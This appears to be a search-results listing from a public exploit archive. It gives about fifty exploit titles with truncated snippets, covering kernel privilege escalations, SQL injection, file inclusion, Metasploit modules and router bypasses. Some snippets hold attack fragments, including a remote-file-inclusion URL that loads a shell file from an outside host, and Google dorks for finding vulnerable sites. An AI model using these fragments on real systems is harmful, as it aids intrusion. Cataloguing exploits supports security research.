41207 matches found
Linux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation
Linux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation / expmoosecox.c Watch a video of the exploit here: http://www.youtube.com/watch?v=jt81NvaOj5Y developed entirely by Ingo Molnar exploit writer extraordinaire! , thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :...
Maran PHP Shop - prod.php SQL Injection
Maran PHP Shop - prod.php SQL Injection Maran PHP Shop prod.php cat SQL Injection Vulnerability url: http://www.maran.pamil-visions.com/maranshop.php Author: JosS mail: sys-projectathotmaildotcom site: http://spanish-hackers.com team: Spanish Hackers Team - SHT This was written for educational...
PHP-Nuke Module PostGuestbook 0.6.1 - tpl_pgb_moddir Remote File Inclusion
PHP-Nuke Module PostGuestbook 0.6.1 - tplpgbmoddir Remote File Inclusion PostGuestbook 0.6.1tplpgbmoddirRemote File Include Exploit D.Script: http://sourceforge.net/projects/postguestbook/ Dork: "Powered by: PostGuestbook 0.6.1" Discovered by GloDM = Mahmoodali Homepage: http://www.Tryag.cc Greet...
Microsoft VSCode Python Extension - Code Execution
Microsoft VSCode Python Extension - Code Execution VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folder...
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC Remote Code Execution', 'Description' = %q ...
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Date: 2020-01-07 Exploit Author: Harrison Neal, PatchAdvisor Vendor Homepage: https://tomcat.apache.org/ Software Link:...
Microsoft Windows 7 (x86) - BlueKeep Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free
Microsoft Windows 7 x86 - BlueKeep Remote Desktop Protocol RDP Remote Windows Kernel Use After Free EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload...
LiteCart 2.1.2 - Arbitrary File Upload
LiteCart 2.1.2 - Arbitrary File Upload Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload Date: 2018-08-27 Exploit Author: Haboob Team Software Link: https://www.litecart.net/downloading?version=2.1.2 Version: 2.1.2 CVE : CVE-2018-12256 1. Description admin/vqmods.app/vqmods.inc.php in LiteCar...
XiongMai uc-httpd 1.0.0 - Buffer Overflow
XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow Date: 2018-06-08 Exploit Author: Andrew Watson Software Version: XiongMai uc-httpd 1.0.0 Vendor Homepage: http://www.xiongmaitech.com/en/ Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on...
ISC BIND 9 - TKEY Remote Denial of Service (PoC)
ISC BIND 9 - TKEY Remote Denial of Service PoC !/usr/bin/env python Exploit Title: PoC for BIND9 TKEY DoS Exploit Author: elceef Software Link: https://github.com/elceef/tkeypoc/ Version: ISC BIND 9 Tested on: multiple CVE : CVE-2015-5477 import socket import sys print'CVE-2015-5477 BIND9 TKEY Po...
rConfig 3.9.4 - search.crud.php Remote Command Injection
rConfig 3.9.4 - search.crud.php Remote Command Injection Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link:...
Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
Microtik SSH Daemon 6.44.3 - Denial of Service PoC Exploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: ...
Cisco RV300 RV320 - Information Disclosure
Cisco RV300 RV320 - Information Disclosure Exploit Title: 6coRV Exploit Date: 01-26-2018 Exploit Author: Harom Ramos Horus Tested on: Cisco RV300/RV320 CVE : CVE-2019-1653 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from fakeuseragent import UserAgent d...
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (polkit Method)
Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation polkit Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses polkit technique ---...
μTorrent (uTorrent) ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure
μTorrent uTorrent ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure By default, uTorrent creates an HTTP RPC server on port 10000 uTorrent classic or 19575 uTorrent web. There are numerous problems with these RPC servers that can be exploited by any website using XMLHttpRequest. T...
PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution
PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution !/usr/bin/python intro = """\03394m / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // PHPMailer /...
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting source: https://www.securityfocus.com/bid/40230/info The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue...
ClipShare Pro 2006-2007 - chid SQL Injection
ClipShare Pro 2006-2007 - chid SQL Injection ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE...
Veyon 4.3.4 - VeyonService Unquoted Service Path
Veyon 4.3.4 - VeyonService Unquoted Service Path Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path Discovery by: Víctor García Discovery Date: 2020-03-23 Vendor Homepage: https://veyon.io/ Software Link:...
PHPKB Multi-Language 9 - Authenticated Directory Traversal
PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation
xorg-x11-server 1.20.3 Solaris 11 - inittab Local Privilege Escalation !/bin/sh Exploit Title: xorg-x11-server A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the...
VirtualBox 5.2.6.r120293 - VM Escape
VirtualBox 5.2.6.r120293 - VM Escape Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration VBVA feature affecting Linux hosts. VBVA feature works o...
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation EDB Note Download: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip COMahawk...
rConfig 3.9 - searchColumn SQL Injection
rConfig 3.9 - searchColumn SQL Injection Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see al...
ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - .asx Local Stack Overflow
ASX to MP3 Converter 1.82.50 Windows 2003 x86 - .asx Local Stack Overflow / ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team holahola https://www.exploit-db.com/exploits/38382/ Winblows 2k3 / include include include int main int i; char overwriteoffset =...
GNU Bash - Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
Joomla! Component com_newsfeeds 1.0 - feedid SQL Injection
Joomla! Component comnewsfeeds 1.0 - feedid SQL Injection Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork:...
Ricoh Printer Drivers - Local Privilege Escalation
Ricoh Printer Drivers - Local Privilege Escalation / This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded CVE-2019-19363. Written by Pentagrid AG, 2019. Cf...
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled config option UsePrivilegeSeparation=no. While privilege separatio...
Zentrack 2.22.32.4 - index.php Remote File Inclusion
Zentrack 2.22.32.4 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote...
Wordpress Plugin Search Meter 2.13.2 - CSV injection
Wordpress Plugin Search Meter 2.13.2 - CSV injection Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link:...
Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash
Binary File Descriptor Library libbfd - Out-of-Bounds Crash Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is tha...
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure !/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re...
Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion
Coppermine Photo Gallery 1.2.2b Nuke Addon - Remote File Inclusion ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Coppermine Photo Gallery v1.2.2b for...
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link:...
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection Shellshock !/usr/bin/python Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC Date: 2014-09-29 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1 Tested on: Debian, Ubuntu, Kali CVE: CVE-2014-6277,...
Tagger Luxury Edition - BBCodeFile Remote File Inclusion
Tagger Luxury Edition - BBCodeFile Remote File Inclusion Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dor...
cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)
cPanel 5.0 - Guestbook.cgi Remote Command Execution 4 source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cg...
AnyBurn 4.8 - Buffer Overflow (SEH)
AnyBurn 4.8 - Buffer Overflow SEH Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterpri...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8...
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Date: 2019-10-30 Exploit Author: Jacob Baines Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download Version: 6.45.6 Stable and below or 6.44.5 Long-term and...
Dahua DVR 2.608.0000.02.608.GV00.0 - Authentication Bypass (Metasploit)
Dahua DVR 2.608.0000.02.608.GV00.0 - Authentication Bypass Metasploit Dahua DVR Authentication Bypass - CVE-2013-6117 --Summary-- Dahua web-enabled DVRs and rebranded versions do not enforce authentication on their administrative services. Zhejiang Dahua Technology Co., Ltd...
Microsoft Visual Basic 2010 Express - XML External Entity Injection
Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Author: ZwX Exploit Date: 2019-12-03 Version Software : 10.0.30319.1 RTMRel Vendor Homepage : https://www.microsoft.com/ Software Link:...
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 2040.5034: Access violation - code c0000005 first...
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details ======= Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected...
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
Linux Kernel 4.8.0-41-generic Ubuntu - Packet Socket Local Privilege Escalation // A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // //...
RomPager 4.34 (Multiple Router Vendors) - Misfortune Cookie Authentication Bypass
RomPager 4.34 Multiple Router Vendors - Misfortune Cookie Authentication Bypass Title: Misfortune Cookie Exploit RomPager = 4.34 router authentication remover Date: 17/4/2016 CVE: CVE-2015-9222 http://mis.fortunecook.ie Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... Vulnerable models...
QNAP Netatalk 3.1.12 - Authentication Bypass
QNAP Netatalk 3.1.12 - Authentication Bypass Exploit Title: QNAP Netatalk Authentication Bypass Date: 12/20/2018 Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link:...
snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (2)
snapd 2.37 Ubuntu - dirtysock Local Privilege Escalation 2 !/usr/bin/env python3 """ dirtysock: Privilege Escalation in Ubuntu via snapd In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository...